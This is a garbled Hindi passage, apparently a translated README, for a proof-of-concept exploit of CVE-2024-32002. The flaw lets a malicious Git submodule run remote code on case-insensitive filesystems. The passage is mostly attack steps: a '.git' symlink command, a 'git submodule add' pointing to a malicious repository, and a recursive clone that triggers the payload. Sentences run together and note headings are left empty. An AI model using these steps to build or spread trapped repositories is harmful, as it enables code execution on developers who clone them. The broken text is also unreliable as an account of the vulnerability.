
CVE-2024-32002 के लिए अवधारणा-प्रमाण एक्सप्लॉइट, केस-असंवेदनशील फ़ाइल सिस्टम पर दुर्भावनापूर्ण Git उपमॉड्यूल के माध्यम से दूरस्थ कोड निष्पादन का प्रदर्शन करता है।
CVE-2024-32002 के लिए एक POC जो रिमोट कोड निष्पादन (RCE) प्रदर्शित करता है।
संबंधित सबमॉड्यूल रिपॉजिटरी के लिए cve-2024-32002-poc-rce देखें।
.git निर्देशिका से लिंक करता है।.gitmodules फ़ाइल जो दुर्भावनापूर्ण सबमॉड्यूल को परिभाषित करती है।यह रिपॉजिटरी लिनक्स (विशेष रूप से WSL2) में बनाई गई थी। यह महत्वपूर्ण है, दुर्भावनापूर्ण रिपॉजिटरी केवल केस-सेंसिटिव फ़ाइलसिस्टम पर ही बनाई जा सकती है।
ln -s .git submodule
नोट्स:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
नोट्स:
.git निर्देशिका के अंदर उस पथ के नाम से मेल खाता है जो सबमॉड्यूल के लिए git स्थिति को ट्रैक करता है।यह कमजोरी केवल विंडोज और मैकओएस को प्रभावित करती है क्योंकि दोनों में केस-इनसेंसिटिव फ़ाइलसिस्टम होते हैं।
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git